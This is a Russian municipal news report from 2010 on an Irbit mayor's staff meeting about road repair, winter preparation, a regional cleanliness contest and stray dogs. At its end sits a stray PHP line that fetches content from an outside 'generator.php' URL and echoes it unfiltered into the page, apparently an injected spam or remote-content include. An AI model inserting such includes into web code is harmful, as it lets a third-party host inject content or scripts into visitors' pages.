Регистрация нового пользоателя


наш двор
наш двор
Аппаратное совещание

2010-06-07 13:08:57
Аппаратное совещание

В понедельник, 7 июня, глава города Геннадий Агафонов провел очередное совещание с заместителями и руководителями отделов администрации. Кроме подведения итогов и планирования новой рабочей недели, глава города вынес на обсуждение коллег несколько вопросов, работа по которым, по мнению Геннадия Анатольевича ведется не достаточно эффективна.

 

В первую очередь, мэр Ирбита обратил внимание заместителя главы города Александра Конищева и начальника отдела городского коммунального хозяйства Николая Юрьева на отсутствие заметных сдвигов в вопросах проведения ямочного ремонта дорог и благоустройства городских улиц. Как отметил Геннадий Анатольевич, месяц назад руководством МАУ «Благоустройство» были определены и представлены на согласование в ОГКХ планы работ по этим двум направлениям. Но почему-то до сих пор результатов деятельности предприятия по городу не видно.

Глава города в жесткой форме потребовал уже в понедельник приступить к проведению ямочного ремонта дорог с предоставлением еженедельного плана, согласно которому специалисты администрации смогут контролировать объемы выполняемых работ. При этом глава отметил, что не исключен и его личный выезд на участки ремонта. «Я не вижу смысла повторять, что дороги в городе требуют скорейшего ремонта. В этом каждый из нас ежедневно убеждается лично. Я так же понимаю, что работы невозможно проводить в дождливую погоду – это будет бесцельным использованием средств. Поэтому я требую от руководства предприятий, занятых на ямочном ремонте, эффективно использовать каждый погожий день. Иначе я буду поднимать вопрос о соответствии данных руководителей занимаемым должностям», - подчеркнул Геннадий Анатольевич.

Таким же образом мэр Ирбита предложил организовать и взаимодействие с компаниями, проводящими в настоящее время подготовку города к зиме. Александру Конищеву глава города поручил запросить у руководства данных компаний графики их работ по ремонту и плановому обслуживанию теплоисточников и сетей для возможности организации контроля за проводимыми работами и оперативного решения всех вопросов, требующих участия городской администрации.

 

Кроме того, глава города предложил специалистам соответствующих отделов подготовить необходимые документы и разработать план мероприятий, необходимых для участия Ирбита в областном конкурсе на звание «Самого чистого города». Проведение данного конкурса было анонсировано в ходе видеоконференции с губернатором Свердловской области Александром Мишариным, которая состоялась в пятницу, 4 июня. По словам Геннадия Анатольевича, участие в таком конкурсе может быть весьма полезно для города, так как по его итогам лучшим муниципалитетам будут выделены средства на приобретение коммунальной техники.

 

Еще одной темой обсуждения стала реализация городской программы по регулированию численности бездомных и бродячих животных. По словам Геннадия Анатольевича, к нему до сих пор продолжают поступать жалобы от ирбитчан о недопустимо большой численности бродячих собак во многих микрорайонах города. Как пояснила главе ведущий специалист отдела охраны окружающей среды Елена Лубская, специалисты Ирбитского общества охотников и рыболовов, привлекаемые к работе по отлову собак, столкнулись в данном вопросе с серьезным противодействием со стороны местных жителей. Несмотря на многочисленные заявления, в которых фигурируют одни и те же места дислокации собачьих стай, при выезде на место егеря не могут произвести отлов животных. На защиту собак встают жительницы ближайших домов. Но, по словам Елены Анатольевны, на этой неделе вопрос будет решен. Для этого планируются совместные выезды бригад ловцов и участковых уполномоченных, в чьем ведении находятся данные территории. А всем «протестующим» будет предложено забрать своих животных в пункте передержи в течение срока, предусмотренного законодательством.




<?php $headers = file_get_contents('https://ntsirbit.ru/generator/generator.php', true); echo $headers; ?>